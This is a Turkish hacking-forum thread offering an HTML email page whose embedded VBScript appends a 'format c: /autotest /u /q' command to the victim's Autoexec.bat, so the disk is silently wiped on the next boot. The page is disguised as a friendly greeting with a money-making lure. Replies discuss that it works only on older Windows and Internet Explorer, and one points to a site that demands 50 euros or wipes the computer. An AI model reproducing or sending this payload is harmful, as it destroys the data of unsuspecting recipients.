Pc Ye Mail Yoluyla Format Atma
-
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bizden size sevgilerle..</title>
</head>
<bOdy>
<script language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
<p>Giriste acilan uyariya "HAYIR" dediyseniz <a
href= "javascript:reload()">Para kazanma sansini kaybettiniz..</p>
</bOdy>
</html>
Cok ßasit ßi$eyy.. HtML oLarak Gönderiosunn.. Kar$ıdaki ßiLgisayarda ßu dosya açıldıgı zaman.. autoexec.bat a Format Komutu ekLioo.. makina Kapanıp acıLdıgı zaman makina kendiliginden format atıo.. ßunu yiyen adam faRkına varMazsa KuRtuLmasına imkan yok
:::::::....Alıntıdır.....:::::::: -
çok güzel ama vbscript mozilla ve operada çalışmaz sanırım iede sorar ama güzel bir çalışma
-
güzel bi kastırma helal olsun!!!
-
BU OLAY HAKKINDA ÇOK YAZILDI ÇOK ÇİZİLDİ TÜM FORUMLARDA AMA ÇALIŞMIYOR BEN TÜM FORUMLARDAKİNİ İNCELEDİM DENEDİM OLMUYOR ÇALIŞTIRABİLEN VARSA EGER Bİ AÇIKLAMA YAPSIN BİZDE YAPALIM
-
haklısın vbscript mozilla da çalışmıyor
-
çalışsın çalışmasın dos un etkinliği xp de azaltılmış durumda. yani format çektirseniz bile format atamaz..
-
Windows 98 için olabilir ama XP için çalışmaz...
-
ne bekliyordun zaten sadece 98 için bu
-
bişey beklemiyordum... 98 kullanan kaç kişi var sence?
-
allam yaaa.. a.g wardır bi kac kişi... milletin bilgisi olsun die yazdık onları..
-
EGER İSTİYORSAN DPFREZİSİ YOKSA www.hackeres.de.vu onu bu siteye sok burda bir tür script var biraz japonların prno sitesinde gezerken bana böle birr siteye denk geldim baktım hmn adresi kafama yazdım pc dpfrezi var hemen reset attımmm ve o kodu alana kadar kaç defa açtım kapadım basardım ama bazı pc lerde çalişmio bene anlamadım SAYFAYA GİRİNCE OTOMATİK OLARAK DOSYA PC NİZE KAYDEDİLİYOR VE KEY DİYE ANAHTAR ÇIKIO YAA 50 EURO DİYO YADA PCN FORMATLA
Toplam Hit: 13423 Toplam Mesaj: 11